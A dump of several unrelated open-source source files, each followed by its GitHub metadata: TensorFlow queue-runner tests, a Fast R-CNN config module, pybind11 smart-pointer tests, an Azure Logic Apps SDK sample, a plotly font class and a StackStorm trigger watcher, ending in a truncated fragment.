init_op = tf.global_variables_initializer()
qr = tf.train.QueueRunner(queue, [count_up_to])
tf.train.add_queue_runner(qr)
with self.test_session(graph=graph) as sess:
init_op.run()
threads = tf.train.start_queue_runners(sess)
for t in threads:
t.join()
self.assertEqual(0, len(qr.exceptions_raised))
# The variable should be 3.
self.assertEqual(3, var.eval())
def testQueueRunnerSerializationRoundTrip(self):
graph = tf.Graph()
with graph.as_default():
queue = tf.FIFOQueue(10, tf.float32, name="queue")
enqueue_op = tf.no_op(name="enqueue")
close_op = tf.no_op(name="close")
cancel_op = tf.no_op(name="cancel")
qr0 = tf.train.QueueRunner(
queue, [enqueue_op], close_op, cancel_op,
queue_closed_exception_types=(
tf.errors.OutOfRangeError, tf.errors.CancelledError))
qr0_proto = tf.train.QueueRunner.to_proto(qr0)
qr0_recon = tf.train.QueueRunner.from_proto(qr0_proto)
self.assertEqual("queue", qr0_recon.queue.name)
self.assertEqual(1, len(qr0_recon.enqueue_ops))
self.assertEqual(enqueue_op, qr0_recon.enqueue_ops[0])
self.assertEqual(close_op, qr0_recon.close_op)
self.assertEqual(cancel_op, qr0_recon.cancel_op)
self.assertEqual(
(tf.errors.OutOfRangeError, tf.errors.CancelledError),
qr0_recon.queue_closed_exception_types)
# Assert we reconstruct an OutOfRangeError for QueueRunners
# created before QueueRunnerDef had a queue_closed_exception_types field.
del qr0_proto.queue_closed_exception_types[:]
qr0_legacy_recon = tf.train.QueueRunner.from_proto(qr0_proto)
self.assertEqual("queue", qr0_legacy_recon.queue.name)
self.assertEqual(1, len(qr0_legacy_recon.enqueue_ops))
self.assertEqual(enqueue_op, qr0_legacy_recon.enqueue_ops[0])
self.assertEqual(close_op, qr0_legacy_recon.close_op)
self.assertEqual(cancel_op, qr0_legacy_recon.cancel_op)
self.assertEqual(
(tf.errors.OutOfRangeError,),
qr0_legacy_recon.queue_closed_exception_types)
if __name__ == "__main__":
tf.test.main()
| {
"content_hash": "4de577bce92379da59564115010987c3",
"timestamp": "",
"source": "github",
"line_count": 282,
"max_line_length": 79,
"avg_line_length": 38.61347517730496,
"alnum_prop": 0.6439526127284415,
"repo_name": "gibiansky/tensorflow",
"id": "9bc2c30285a9246d2e7b4947af866578bf8b4746",
"size": "11579",
"binary": false,
"copies": "12",
"ref": "refs/heads/master",
"path": "tensorflow/python/training/queue_runner_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "6963"
},
{
"name": "C",
"bytes": "118477"
},
{
"name": "C++",
"bytes": "14646706"
},
{
"name": "CMake",
"bytes": "111373"
},
{
"name": "CSS",
"bytes": "774"
},
{
"name": "Go",
"bytes": "96398"
},
{
"name": "HTML",
"bytes": "534568"
},
{
"name": "Java",
"bytes": "179112"
},
{
"name": "JavaScript",
"bytes": "13406"
},
{
"name": "Jupyter Notebook",
"bytes": "1833491"
},
{
"name": "Makefile",
"bytes": "23553"
},
{
"name": "Objective-C",
"bytes": "7056"
},
{
"name": "Objective-C++",
"bytes": "64592"
},
{
"name": "Protocol Buffer",
"bytes": "152280"
},
{
"name": "Python",
"bytes": "15069371"
},
{
"name": "Shell",
"bytes": "312259"
},
{
"name": "TypeScript",
"bytes": "761620"
}
],
"symlink_target": ""
} |
"""Fast R-CNN config system.
This file specifies default config options for Fast R-CNN. You should not
change values in this file. Instead, you should write a config file (in yaml)
and use cfg_from_file(yaml_file) to load it and override the default options.
Most tools in $ROOT/tools take a --cfg option to specify an override file.
- See tools/{train,test}_net.py for example code that uses cfg_from_file()
- See experiments/cfgs/*.yml for example YAML config override files
"""
import os
import os.path as osp
import numpy as np
# `pip install easydict` if you don't have it
from easydict import EasyDict as edict
__C = edict()
# Consumers can get config by:
# from fast_rcnn_config import cfg
cfg = __C
#
# Training options
#
__C.TRAIN = edict()
# Scales to use during training (can list multiple scales)
# Each scale is the pixel size of an image's shortest side
__C.TRAIN.SCALES = (600,)
# Max pixel size of the longest side of a scaled input image
__C.TRAIN.MAX_SIZE = 1000
# Images to use per minibatch
__C.TRAIN.IMS_PER_BATCH = 2
# Minibatch size (number of regions of interest [ROIs])
__C.TRAIN.BATCH_SIZE = 128
# Fraction of minibatch that is labeled foreground (i.e. class > 0)
__C.TRAIN.FG_FRACTION = 0.25
# Overlap threshold for a ROI to be considered foreground (if >= FG_THRESH)
__C.TRAIN.FG_THRESH = 0.5
# Overlap threshold for a ROI to be considered background (class = 0 if
# overlap in [LO, HI))
__C.TRAIN.BG_THRESH_HI = 0.5
__C.TRAIN.BG_THRESH_LO = 0.1
# Use horizontally-flipped images during training?
__C.TRAIN.USE_FLIPPED = True
# Train bounding-box regressors
__C.TRAIN.BBOX_REG = True
# Overlap required between a ROI and ground-truth box in order for that ROI to
# be used as a bounding-box regression training example
__C.TRAIN.BBOX_THRESH = 0.5
# Iterations between snapshots
__C.TRAIN.SNAPSHOT_ITERS = 10000
# solver.prototxt specifies the snapshot path prefix, this adds an optional
# infix to yield the path: <prefix>[_<infix>]_iters_XYZ.caffemodel
__C.TRAIN.SNAPSHOT_INFIX = ''
# Use a prefetch thread in roi_data_layer.layer
# So far I haven't found this useful; likely more engineering work is required
__C.TRAIN.USE_PREFETCH = False
#
# Testing options
#
__C.TEST = edict()
# Scales to use during testing (can list multiple scales)
# Each scale is the pixel size of an image's shortest side
__C.TEST.SCALES = (600,)
# Max pixel size of the longest side of a scaled input image
__C.TEST.MAX_SIZE = 1000
# Overlap threshold used for non-maximum suppression (suppress boxes with
# IoU >= this threshold)
__C.TEST.NMS = 0.3
# Experimental: treat the (K+1) units in the cls_score layer as linear
# predictors (trained, eg, with one-vs-rest SVMs).
__C.TEST.SVM = False
# Test using bounding-box regressors
__C.TEST.BBOX_REG = True
#
# MISC
#
# The mapping from image coordinates to feature map coordinates might cause
# some boxes that are distinct in image space to become identical in feature
# coordinates. If DEDUP_BOXES > 0, then DEDUP_BOXES is used as the scale factor
# for identifying duplicate boxes.
# 1/16 is correct for {Alex,Caffe}Net, VGG_CNN_M_1024, and VGG16
__C.DEDUP_BOXES = 1./16.
# Pixel mean values (BGR order) as a (1, 1, 3) array
# These are the values originally used for training VGG16
__C.PIXEL_MEANS = np.array([[[102.9801, 115.9465, 122.7717]]])
# For reproducibility
__C.RNG_SEED = 3
# A small number that's used many times
__C.EPS = 1e-14
# Root directory of project
__C.ROOT_DIR = osp.abspath(osp.join(osp.dirname(__file__), '..', '..'))
# Place outputs under an experiments directory
__C.EXP_DIR = 'default'
def get_output_dir(imdb, net):
"""Return the directory where experimental artifacts are placed.
A canonical path is built using the name from an imdb and a network
(if not None).
"""
path = osp.abspath(osp.join(__C.ROOT_DIR, 'output', __C.EXP_DIR, imdb.name))
if net is None:
return path
else:
return osp.join(path, net.name)
def _merge_a_into_b(a, b):
"""Merge config dictionary a into config dictionary b, clobbering the
options in b whenever they are also specified in a.
"""
if type(a) is not edict:
return
for k, v in a.iteritems():
# a must specify keys that are in b
if not b.has_key(k):
raise KeyError('{} is not a valid config key'.format(k))
# the types must match, too
if type(b[k]) is not type(v):
raise ValueError(('Type mismatch ({} vs. {}) '
'for config key: {}').format(type(b[k]),
type(v), k))
# recursively merge dicts
if type(v) is edict:
try:
_merge_a_into_b(a[k], b[k])
except:
print('Error under config key: {}'.format(k))
raise
else:
b[k] = v
def cfg_from_file(filename):
"""Load a config file and merge it into the default options."""
import yaml
with open(filename, 'r') as f:
yaml_cfg = edict(yaml.load(f))
_merge_a_into_b(yaml_cfg, __C)
| {
"content_hash": "97ebc15a2fbed4a2795b0813e6e89fbe",
"timestamp": "",
"source": "github",
"line_count": 171,
"max_line_length": 80,
"avg_line_length": 30.029239766081872,
"alnum_prop": 0.6648490749756573,
"repo_name": "MichaelXin/fast-rcnn",
"id": "ee22d8e569f8bfcf0be3472c18f5d99e4cf4b465",
"size": "5384",
"binary": false,
"copies": "17",
"ref": "refs/heads/master",
"path": "lib/fast_rcnn/config.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "56"
},
{
"name": "Matlab",
"bytes": "10660"
},
{
"name": "Python",
"bytes": "71104"
},
{
"name": "Shell",
"bytes": "16276"
}
],
"symlink_target": ""
} |
"""Pinpoint Service (Python 3)
"""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import six
if six.PY3:
import logging
import google.cloud.logging
google.cloud.logging.Client().setup_logging(log_level=logging.DEBUG)
from dashboard.pinpoint import dispatcher
APP = dispatcher.APP
| {
"content_hash": "e5ffab65eb1d0d3df6b95cc28fe63191",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 70,
"avg_line_length": 20.764705882352942,
"alnum_prop": 0.7592067988668555,
"repo_name": "catapult-project/catapult",
"id": "a7d2d573ce6a0f58766810ad1f5db281a765000e",
"size": "515",
"binary": false,
"copies": "6",
"ref": "refs/heads/main",
"path": "dashboard/dashboard/pinpoint/main.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1324"
},
{
"name": "C++",
"bytes": "46069"
},
{
"name": "CSS",
"bytes": "23376"
},
{
"name": "Dockerfile",
"bytes": "1541"
},
{
"name": "Go",
"bytes": "114396"
},
{
"name": "HTML",
"bytes": "12394298"
},
{
"name": "JavaScript",
"bytes": "1559584"
},
{
"name": "Makefile",
"bytes": "1774"
},
{
"name": "Python",
"bytes": "6778695"
},
{
"name": "Shell",
"bytes": "2288"
}
],
"symlink_target": ""
} |
import pytest
from pybind11_tests import ConstructorStats
def test_smart_ptr(capture):
# Object1
from pybind11_tests import (MyObject1, make_object_1, make_object_2,
print_object_1, print_object_2, print_object_3, print_object_4)
for i, o in enumerate([make_object_1(), make_object_2(), MyObject1(3)], start=1):
assert o.getRefCount() == 1
with capture:
print_object_1(o)
print_object_2(o)
print_object_3(o)
print_object_4(o)
assert capture == "MyObject1[{i}]\n".format(i=i) * 4
from pybind11_tests import (make_myobject1_1, make_myobject1_2,
print_myobject1_1, print_myobject1_2,
print_myobject1_3, print_myobject1_4)
for i, o in enumerate([make_myobject1_1(), make_myobject1_2(), MyObject1(6), 7], start=4):
print(o)
with capture:
if not isinstance(o, int):
print_object_1(o)
print_object_2(o)
print_object_3(o)
print_object_4(o)
print_myobject1_1(o)
print_myobject1_2(o)
print_myobject1_3(o)
print_myobject1_4(o)
assert capture == "MyObject1[{i}]\n".format(i=i) * (4 if isinstance(o, int) else 8)
cstats = ConstructorStats.get(MyObject1)
assert cstats.alive() == 0
expected_values = ['MyObject1[{}]'.format(i) for i in range(1, 7)] + ['MyObject1[7]'] * 4
assert cstats.values() == expected_values
assert cstats.default_constructions == 0
assert cstats.copy_constructions == 0
# assert cstats.move_constructions >= 0 # Doesn't invoke any
assert cstats.copy_assignments == 0
assert cstats.move_assignments == 0
# Object2
from pybind11_tests import (MyObject2, make_myobject2_1, make_myobject2_2,
make_myobject3_1, make_myobject3_2,
print_myobject2_1, print_myobject2_2,
print_myobject2_3, print_myobject2_4)
for i, o in zip([8, 6, 7], [MyObject2(8), make_myobject2_1(), make_myobject2_2()]):
print(o)
with capture:
print_myobject2_1(o)
print_myobject2_2(o)
print_myobject2_3(o)
print_myobject2_4(o)
assert capture == "MyObject2[{i}]\n".format(i=i) * 4
cstats = ConstructorStats.get(MyObject2)
assert cstats.alive() == 1
o = None
assert cstats.alive() == 0
assert cstats.values() == ['MyObject2[8]', 'MyObject2[6]', 'MyObject2[7]']
assert cstats.default_constructions == 0
assert cstats.copy_constructions == 0
# assert cstats.move_constructions >= 0 # Doesn't invoke any
assert cstats.copy_assignments == 0
assert cstats.move_assignments == 0
# Object3
from pybind11_tests import (MyObject3, print_myobject3_1, print_myobject3_2,
print_myobject3_3, print_myobject3_4)
for i, o in zip([9, 8, 9], [MyObject3(9), make_myobject3_1(), make_myobject3_2()]):
print(o)
with capture:
print_myobject3_1(o)
print_myobject3_2(o)
print_myobject3_3(o)
print_myobject3_4(o)
assert capture == "MyObject3[{i}]\n".format(i=i) * 4
cstats = ConstructorStats.get(MyObject3)
assert cstats.alive() == 1
o = None
assert cstats.alive() == 0
assert cstats.values() == ['MyObject3[9]', 'MyObject3[8]', 'MyObject3[9]']
assert cstats.default_constructions == 0
assert cstats.copy_constructions == 0
# assert cstats.move_constructions >= 0 # Doesn't invoke any
assert cstats.copy_assignments == 0
assert cstats.move_assignments == 0
# Object and ref
from pybind11_tests import Object, cstats_ref
cstats = ConstructorStats.get(Object)
assert cstats.alive() == 0
assert cstats.values() == []
assert cstats.default_constructions == 10
assert cstats.copy_constructions == 0
# assert cstats.move_constructions >= 0 # Doesn't invoke any
assert cstats.copy_assignments == 0
assert cstats.move_assignments == 0
cstats = cstats_ref()
assert cstats.alive() == 0
assert cstats.values() == ['from pointer'] * 10
assert cstats.default_constructions == 30
assert cstats.copy_constructions == 12
# assert cstats.move_constructions >= 0 # Doesn't invoke any
assert cstats.copy_assignments == 30
assert cstats.move_assignments == 0
def test_smart_ptr_refcounting():
from pybind11_tests import test_object1_refcounting
assert test_object1_refcounting()
def test_unique_nodelete():
from pybind11_tests import MyObject4
o = MyObject4(23)
assert o.value == 23
cstats = ConstructorStats.get(MyObject4)
assert cstats.alive() == 1
del o
cstats = ConstructorStats.get(MyObject4)
assert cstats.alive() == 1 # Leak, but that's intentional
def test_large_holder():
from pybind11_tests import MyObject5
o = MyObject5(5)
assert o.value == 5
cstats = ConstructorStats.get(MyObject5)
assert cstats.alive() == 1
del o
assert cstats.alive() == 0
def test_shared_ptr_and_references():
from pybind11_tests.smart_ptr import SharedPtrRef, A
s = SharedPtrRef()
stats = ConstructorStats.get(A)
assert stats.alive() == 2
ref = s.ref # init_holder_helper(holder_ptr=false, owned=false)
assert stats.alive() == 2
assert s.set_ref(ref)
with pytest.raises(RuntimeError) as excinfo:
assert s.set_holder(ref)
assert "Unable to cast from non-held to held instance" in str(excinfo.value)
copy = s.copy # init_holder_helper(holder_ptr=false, owned=true)
assert stats.alive() == 3
assert s.set_ref(copy)
assert s.set_holder(copy)
holder_ref = s.holder_ref # init_holder_helper(holder_ptr=true, owned=false)
assert stats.alive() == 3
assert s.set_ref(holder_ref)
assert s.set_holder(holder_ref)
holder_copy = s.holder_copy # init_holder_helper(holder_ptr=true, owned=true)
assert stats.alive() == 3
assert s.set_ref(holder_copy)
assert s.set_holder(holder_copy)
del ref, copy, holder_ref, holder_copy, s
assert stats.alive() == 0
def test_shared_ptr_from_this_and_references():
from pybind11_tests.smart_ptr import SharedFromThisRef, B, SharedFromThisVirt
s = SharedFromThisRef()
stats = ConstructorStats.get(B)
assert stats.alive() == 2
ref = s.ref # init_holder_helper(holder_ptr=false, owned=false, bad_wp=false)
assert stats.alive() == 2
assert s.set_ref(ref)
assert s.set_holder(ref) # std::enable_shared_from_this can create a holder from a reference
bad_wp = s.bad_wp # init_holder_helper(holder_ptr=false, owned=false, bad_wp=true)
assert stats.alive() == 2
assert s.set_ref(bad_wp)
with pytest.raises(RuntimeError) as excinfo:
assert s.set_holder(bad_wp)
assert "Unable to cast from non-held to held instance" in str(excinfo.value)
copy = s.copy # init_holder_helper(holder_ptr=false, owned=true, bad_wp=false)
assert stats.alive() == 3
assert s.set_ref(copy)
assert s.set_holder(copy)
holder_ref = s.holder_ref # init_holder_helper(holder_ptr=true, owned=false, bad_wp=false)
assert stats.alive() == 3
assert s.set_ref(holder_ref)
assert s.set_holder(holder_ref)
holder_copy = s.holder_copy # init_holder_helper(holder_ptr=true, owned=true, bad_wp=false)
assert stats.alive() == 3
assert s.set_ref(holder_copy)
assert s.set_holder(holder_copy)
del ref, bad_wp, copy, holder_ref, holder_copy, s
assert stats.alive() == 0
z = SharedFromThisVirt.get()
y = SharedFromThisVirt.get()
assert y is z
def test_move_only_holder():
from pybind11_tests.smart_ptr import TypeWithMoveOnlyHolder
a = TypeWithMoveOnlyHolder.make()
stats = ConstructorStats.get(TypeWithMoveOnlyHolder)
assert stats.alive() == 1
del a
assert stats.alive() == 0
def test_smart_ptr_from_default():
from pybind11_tests.smart_ptr import HeldByDefaultHolder
instance = HeldByDefaultHolder()
with pytest.raises(RuntimeError) as excinfo:
HeldByDefaultHolder.load_shared_ptr(instance)
assert "Unable to load a custom holder type from a default-holder instance" in str(excinfo)
def test_shared_ptr_gc():
"""#187: issue involving std::shared_ptr<> return value policy & garbage collection"""
from pybind11_tests.smart_ptr import ElementList, ElementA
el = ElementList()
for i in range(10):
el.add(ElementA(i))
pytest.gc_collect()
for i, v in enumerate(el.get()):
assert i == v.value()
| {
"content_hash": "0d16e06920d767c2ee3dbab7fc14bff7",
"timestamp": "",
"source": "github",
"line_count": 248,
"max_line_length": 97,
"avg_line_length": 35.20967741935484,
"alnum_prop": 0.6368529546495648,
"repo_name": "ilyaraz/falconn_polygon",
"id": "144180d8ca97633e18111c5ab14b72edb2fc7b0b",
"size": "8732",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "external/pybind11/tests/test_smart_ptr.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "902270"
},
{
"name": "C++",
"bytes": "405121"
},
{
"name": "Makefile",
"bytes": "12494"
},
{
"name": "Python",
"bytes": "37328"
},
{
"name": "Shell",
"bytes": "890"
}
],
"symlink_target": ""
} |
from azure.identity import DefaultAzureCredential
from azure.mgmt.logic import LogicManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-logic
# USAGE
python enable_a_workflow.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = LogicManagementClient(
credential=DefaultAzureCredential(),
subscription_id="34adfa4f-cedf-4dc0-ba29-b6d1a69ab345",
)
response = client.workflows.enable(
resource_group_name="test-resource-group",
workflow_name="test-workflow",
)
print(response)
# x-ms-original-file: specification/logic/resource-manager/Microsoft.Logic/stable/2019-05-01/examples/Workflows_Enable.json
if __name__ == "__main__":
main()
| {
"content_hash": "ff39919cca2d1d86f7474a3342108aa1",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 123,
"avg_line_length": 32.666666666666664,
"alnum_prop": 0.7282003710575139,
"repo_name": "Azure/azure-sdk-for-python",
"id": "cf96b9cc4188ecc9c5498ba8ead4d132c6dcd7c4",
"size": "1546",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/logic/azure-mgmt-logic/generated_samples/enable_a_workflow.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
from plotly.basedatatypes import BaseLayoutHierarchyType as _BaseLayoutHierarchyType
import copy as _copy
class Tickfont(_BaseLayoutHierarchyType):
# class properties
# --------------------
_parent_path_str = "layout.scene.zaxis"
_path_str = "layout.scene.zaxis.tickfont"
_valid_props = {"color", "family", "size"}
# color
# -----
@property
def color(self):
"""
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
Returns
-------
str
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# family
# ------
@property
def family(self):
"""
HTML font family - the typeface that will be applied by the web
browser. The web browser will only be able to apply a font if
it is available on the system which it operates. Provide
multiple font families, separated by commas, to indicate the
preference in which to apply fonts if they aren't available on
the system. The Chart Studio Cloud (at https://chart-
studio.plotly.com or on-premise) generates images on a server,
where only a select number of fonts are installed and
supported. These include "Arial", "Balto", "Courier New",
"Droid Sans",, "Droid Serif", "Droid Sans Mono", "Gravitas
One", "Old Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
The 'family' property is a string and must be specified as:
- A non-empty string
Returns
-------
str
"""
return self["family"]
@family.setter
def family(self, val):
self["family"] = val
# size
# ----
@property
def size(self):
"""
The 'size' property is a number and may be specified as:
- An int or float in the interval [1, inf]
Returns
-------
int|float
"""
return self["size"]
@size.setter
def size(self, val):
self["size"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The Chart
Studio Cloud (at https://chart-studio.plotly.com or on-
premise) generates images on a server, where only a
select number of fonts are installed and supported.
These include "Arial", "Balto", "Courier New", "Droid
Sans",, "Droid Serif", "Droid Sans Mono", "Gravitas
One", "Old Standard TT", "Open Sans", "Overpass", "PT
Sans Narrow", "Raleway", "Times New Roman".
size
"""
def __init__(self, arg=None, color=None, family=None, size=None, **kwargs):
"""
Construct a new Tickfont object
Sets the tick font.
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.layout.scene.zaxis.Tickfont`
color
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The Chart
Studio Cloud (at https://chart-studio.plotly.com or on-
premise) generates images on a server, where only a
select number of fonts are installed and supported.
These include "Arial", "Balto", "Courier New", "Droid
Sans",, "Droid Serif", "Droid Sans Mono", "Gravitas
One", "Old Standard TT", "Open Sans", "Overpass", "PT
Sans Narrow", "Raleway", "Times New Roman".
size
Returns
-------
Tickfont
"""
super(Tickfont, self).__init__("tickfont")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.layout.scene.zaxis.Tickfont
constructor must be a dict or
an instance of :class:`plotly.graph_objs.layout.scene.zaxis.Tickfont`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("color", None)
_v = color if color is not None else _v
if _v is not None:
self["color"] = _v
_v = arg.pop("family", None)
_v = family if family is not None else _v
if _v is not None:
self["family"] = _v
_v = arg.pop("size", None)
_v = size if size is not None else _v
if _v is not None:
self["size"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
| {
"content_hash": "1d043e7722075c095f84129e13d95780",
"timestamp": "",
"source": "github",
"line_count": 227,
"max_line_length": 84,
"avg_line_length": 37.242290748898675,
"alnum_prop": 0.5596167494677076,
"repo_name": "plotly/plotly.py",
"id": "bd3a918362a2a0e56e4279cf91484c7f53e340d7",
"size": "8454",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/graph_objs/layout/scene/zaxis/_tickfont.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "545"
},
{
"name": "JavaScript",
"bytes": "2074"
},
{
"name": "PostScript",
"bytes": "565328"
},
{
"name": "Python",
"bytes": "31506317"
},
{
"name": "TypeScript",
"bytes": "71337"
}
],
"symlink_target": ""
} |
import eventlet
import uuid
from kombu.mixins import ConsumerMixin
from kombu import Connection
from oslo_config import cfg
from st2common import log as logging
from st2common.persistence.trigger import Trigger
from st2common.transport import reactor, publishers
LOG = logging.getLogger(__name__)
class TriggerWatcher(ConsumerMixin):
sleep_interval = 4 # how long to sleep after processing each message
def __init__(self, create_handler, update_handler, delete_handler,
trigger_types=None, queue_suffix=None):
"""
:param create_handler: Function which is called on TriggerDB create event.
:type create_handler: ``callable``
:param update_handler: Function which is called on TriggerDB update event.
:type update_handler: ``callable``
:param delete_handler: Function which is called on TriggerDB delete event.
:type delete_handler: ``callable``
:param trigger_types: If provided, handler function will only be called
if the trigger in the message payload is included
in this list.
:type trigger_types: ``list``
"""
# TODO: Handle trigger type filtering using routing key
self._create_handler = create_handler
self._update_handler = update_handler
self._delete_handler = delete_handler
self._trigger_types = trigger_types
self._trigger_watch_q = self._get_queue(queue_suffix)
self.connection = None
self._load_thread = None
self._updates_thread = None
self._handlers = {
publishers.CREATE_RK: create_handler,
publishers.UPDATE_RK: update_handler,
publishers.DELETE_RK: delete_handler
}
def get_consumers(self, Consumer, channel):
return [Consumer(queues=[self._trigger_watch_q],
accept=['pickle'],
callbacks=[self.process_task])]
def process_task(self, body, message):
LOG.debug('process_task')
LOG.debug(' body: %s', body)
LOG.debug(' message.properties: %s', message.properties)
LOG.debug(' message.delivery_info: %s', message.delivery_info)
routing_key = message.delivery_info.get('routing_key', '')
handler = self._handlers.get(routing_key, None)
try:
if not handler:
LOG.debug('Skipping message %s as no handler was found.', message)
return
trigger_type = getattr(body, 'type', None)
if self._trigger_types and trigger_type not in self._trigger_types:
LOG.debug('Skipping message %s since\'t trigger_type doesn\'t match (type=%s)',
message, trigger_type)
return
try:
handler(body)
except Exception as e:
LOG.exception('Handling failed. Message body: %s. Exception: %s',
body, e.message)
finally:
message.ack()
eventlet.sleep(self.sleep_interval)
def start(self):
try:
self.connection = Connection(cfg.CONF.messaging.url)
self._updates_thread = eventlet.spawn(self.run)
self._load_thread = eventlet.spawn(self._load_triggers_from_db)
except:
LOG.exception('Failed to start watcher.')
self.connection.release()
def stop(self):
try:
self._updates_thread = eventlet.kill(self._updates_thread)
self._load_thread = eventlet.kill(self._load_thread)
finally:
self.connection.release()
# Note: We sleep after we consume a message so we give a chance to other
# green threads to run. If we don't do that, ConsumerMixin will block on
# waiting for a message on the queue.
def on_consume_end(self, connection, channel):
super(TriggerWatcher, self).on_consume_end(connection=connection,
channel=channel)
eventlet.sleep(seconds=self.sleep_interval)
def on_iteration(self):
super(TriggerWatcher, self).on_iteration()
eventlet.sleep(seconds=self.sleep_interval)
def _load_triggers_from_db(self):
for trigger_type in self._trigger_types:
for trigger in Trigger.query(type=trigger_type):
LOG.debug('Found existing trigger: %s in db.' % trigger)
self._handlers[publishers.CREATE_RK](trigger)
@staticmethod
def _get_queue(queue_suffix):
if not queue_suffix:
# pick last 10 digits of uuid. Arbitrary but unique enough for the TriggerWatcher.
u_hex = uuid.uuid4().hex
queue_suffix = uuid.uuid4().hex[len(u_hex) - 10:]
queue_name = 'st2.trigger.watch.%s' % queue_suffix
return reactor.get_trigger_cud_queue(queue_name, routing_key='#')
| {
"content_hash": "a6624582100d354fc2fa941880152af4",
"timestamp": "",
"source": "github",
"line_count": 129,
"max_line_length": 95,
"avg_line_length": 38.51162790697674,
"alnum_prop": 0.6048711755233495,
"repo_name": "grengojbo/st2",
"id": "c57d4a79e5866c49b5a40c7601092eb732f26fb1",
"size": "5748",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "st2common/st2common/services/triggerwatcher.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "198"
},
{
"name": "Makefile",
"bytes": "21186"
},
{
"name": "PowerShell",
"bytes": "299"
},
{
"name": "Python",
"bytes": "2091976"
},
{
"name": "Shell",
"bytes": "7518"
},
{
"name": "Slash",
"bytes": "677"
}
],
"symlink_target": ""
} |
from .tensorflow_constructions import leaky_relu
import scipy.sparse, networkx, tensorflow as tf, numpy as np, pandas as pd
# TODO(mmd): Use generators properly.
def split_into_components(X_df, G):
"""set(X_df.columns) must == set(G.nodes)"""
components = list(networkx.components.connected_components(G))
